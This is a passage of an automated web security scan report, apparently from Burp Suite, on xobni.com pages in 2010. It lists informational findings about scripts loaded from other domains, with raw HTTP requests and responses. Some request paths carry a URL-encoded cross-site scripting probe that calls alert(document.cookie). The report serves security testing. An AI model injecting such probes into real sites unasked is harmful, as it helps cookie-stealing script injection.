Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.4.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Video Gal
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.83. http://www.xobni.com/legal/ip_policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/legal/ip_policy

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /legal/ip_policy HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>IP Policy</TITLE>
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.84. http://www.xobni.com/legal/license previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/legal/license

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /legal/license HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Contrat de Licenc
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.85. http://www.xobni.com/legal/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/legal/privacy

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /legal/privacy HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19920

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Politique de conf
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.86. http://www.xobni.com/legal/tos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/legal/tos

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /legal/tos HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 29656

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Conditions g..n..
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.87. http://www.xobni.com/legal/trademarks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/legal/trademarks

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /legal/trademarks HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Trademarks and Br
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.88. http://www.xobni.com/linkedin-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/linkedin-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /linkedin-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>LinkedIn in Outlo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.89. http://www.xobni.com/lp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/lp/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://widgets.twimg.com/j/2/widget.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</h3>

       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

12.90. http://www.xobni.com/lp/x1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/lp/x1/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /lp/x1/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/fan
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13605

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Le plug-i
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.91. http://www.xobni.com/media/contextual_gadgets/hoovers/xobniHoovers.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/media/contextual_gadgets/hoovers/xobniHoovers.xml

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /media/contextual_gadgets/hoovers/xobniHoovers.xml HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/contextual_gadgets/hoovers/manifest.xml
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:20:42 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 21:52:41 GMT
ETag: "3b2084-1dbc-4870d97fb5c40"
Accept-Ranges: bytes
Content-Length: 7612
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Hoover's by Xobni"
description=""
height="45"
author="Dennis Quintela"
author_email="..."
author_location="San
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

12.92. http://www.xobni.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/mobile

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /mobile HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:05:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16307

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni pour BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.93. http://www.xobni.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/mobile/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /mobile/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/one/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni pour BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.94. http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:20:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7961

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.95. http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:01:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 7805

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.96. http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/mobile81ff6scriptalert(document.cookie)/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /mobile81ff6scriptalert(document.cookie)/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.97. http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8012

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.98. http://www.xobni.com/one previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/one

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /one HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9904

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni One - Conne
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.99. http://www.xobni.com/opensource/NsisDotNet/README.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/opensource/NsisDotNet/README.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /opensource/NsisDotNet/README.htm HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/about/opensource.php
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:20:37 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 18:49:15 GMT
ETag: "3b41dd-c51-477175e3000c0"
Accept-Ranges: bytes
Content-Length: 3153
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>This plugin for the NSIS install</title>
</h
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...

12.100. http://www.xobni.com/outlook-calendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/outlook-calendar

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /outlook-calendar HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11433

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
